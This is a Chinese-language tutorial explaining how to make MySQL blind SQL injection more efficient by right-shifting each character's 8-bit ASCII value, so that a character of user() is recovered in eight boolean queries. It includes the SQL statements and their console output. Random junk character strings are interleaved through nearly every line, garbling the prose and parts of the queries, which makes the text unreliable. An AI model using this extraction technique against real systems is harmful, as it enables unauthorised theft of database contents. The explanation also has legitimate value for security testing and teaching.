关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位

6 F  A6 U, n, F% @4 f

下面将以查询mysql数据库当中user()的第一位为例:



ps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)
4 s5 h8 `  h# M- G, s

; n) S' m, R& ?" ]
首先执行如下sql语句:
3 o! ^6 E  k6 K

" v+ v, j8 J& B9 J$ W. q
4 q4 `+ Y! ~0 v+ n. x, n( Smysql> select (ascii((substr(user(),1,1))) >> 7)=0;

: X4 ?+ y9 X7 x8 ?( i9 r, r

我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的


5 Y3 c* M( m# Y
第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1



如果运算结果为1,说明第一位为0,不为1



+————————————–+

3 Z" U3 F# U8 [2 _) s| (ascii((substr(user(),1,1))) >> 7)=0 |
5 ]; [# n* F- T5 T
+————————————–+
# j3 D0 J6 X' @! q5 E& g
| 1 |
# B6 u3 ^% }- U
# M- ^! [, w# W- s/ Y+————————————–+

, K5 M: k: z2 D. J( t$ P- ^1 row in set (0.00 sec)

9 p; ]) `, K  k' u( J这样我们就确定这个8bit的ascii的第一位为0
2 Q" p! y3 G+ j2 v

' v$ ~" F8 w6 V# [6 t; a& m
第二次我们来做6次右偏移来确定前两位
" Y6 W1 p7 t! ?" @) K

; T$ r3 b, o/ n, Q) P1 A
2 S5 d* l3 J8 ~5 ^3 G0 t前两位可能是01或00,即依然可以与0做比较,

mysql> select (ascii((substr(user(),1,1))) >> 6)=0;
4 E  ?6 Z+ M0 w2 s4 r
+————————————–+

; d3 M* W4 \) J' v6 Q" ^9 r+ ^8 ]| (ascii((substr(user(),1,1))) >> 6)=0 |

  N" Q0 c" l5 g+————————————–+
/ v7 |) |% {8 n8 z/ h7 M- p7 R+ ?' y
| 0 |
, A" r7 r! m) A9 {6 y! o" }
+————————————–+
6 G* ]  m9 M/ X
1 row in set (0.00 sec)
; ~2 a2 X2 [5 D9 }3 N: e
9 I. b$ Z& K! g  j, c; F; i
1 X  L' {" o& }% _& j) e
: v/ s+ ^7 i, f2 q& C结果为0,即第二位为1
& f  O0 Q) x' ~$ p; k8 p


, |! y; @  y/ Q开始猜测前三位为010或011
- s2 O6 o  E  s$ M
8 y2 G. E9 c- l; A

让我们看看010和011的ascii码是多少
0 v! \4 e; m+ V6 q5 ]* D1 m1 ^


分别查询select b’011′ select b’010′

2 n+ N/ m: d7 x9 Y) e: i
! C: [" T/ ^# R  ?/ e
获得结果 010 = 2 011 = 3
9 |) I% ?, N$ @; x5 v! v8 ~7 O

' ]2 s% O7 Y: J8 ^9 X& t9 ]' T/ ?
9 e/ O. T: q% a# A& L执行如下sql:
  m. I9 K  t) p3 a: l! B
! ^. M9 Q7 I6 j* D  T& C5 ^
" o7 A. N" M; U0 O0 T. C- ]# x
mysql> select (ascii((substr(user(),1,1))) >> 5)=2;
0 ^1 H3 i& h: }2 n; U
+————————————–+
' Y; S6 D7 r4 T* s' T  r2 t  d+ g
| (ascii((substr(user(),1,1))) >> 5)=2 |
: g0 O4 V/ N" X$ h0 Z: I1 h1 @
+————————————–+

% o" u7 d- `/ k% p% P0 Q% T, {| 0 |
3 `! n3 s2 Y8 U; k
; t1 |7 Z- T+ c4 K  A5 [+————————————–+
- ]  u0 C) s! V6 T9 P% _: v
即前三位不为010,而是011
/ Y5 p) u' @% m


直到获得最后一位
9 r# {2 d  ~. q
2 ]. I$ `% ?& v/ Y6 Z. F8 {

最终结果为:01110010
- W' u$ E4 Y  d) p- L( O: ]# l, P* u
) v& h* N; ]/ x7 j) f
% w8 \) k+ x, J2 z+ B
' l5 d4 T  Y  S8 Y3 o9 R& c  Q转换一下:
, r9 Y! U9 b( D1 ^( ~
2 e% g% p( f" Y0 i$ m$ ?  w7 b
' r- O6 q9 h# _1 {
( ^" ?, G; Q( @' f# v8 Eselect b’01110010′
, D& j. k) ^# P/ f6 V5 l

" ?3 e# L# U- v2 K
, G" Y- A. J( n) ~1 c查询结果
4 q# [" p* t' A1 k0 `  _


+————-+
' r( q; {* Z& Y) @& v3 ^; U
( Q7 [8 c! L. b' C6 q6 L* F5 K| b’01110010′ |

+————-+
) v, I1 R3 A% Q
- i' T5 l& [, B, u3 H# f3 ?| r |

1 U* u+ r( f5 O" N  Y* \+————-+
0 `9 K$ `" I4 p3 o, l1 o1 h
% I& F3 i% R5 h( @' k. H1 row in set (0.00 sec)
, D# O" m$ @! H' m, L


# E% ^% l" r8 z9 R! Y- @! N9 _这样我们就获得了user()的第一位.其它位依此类推
% _# S) R5 v5 s6 H" G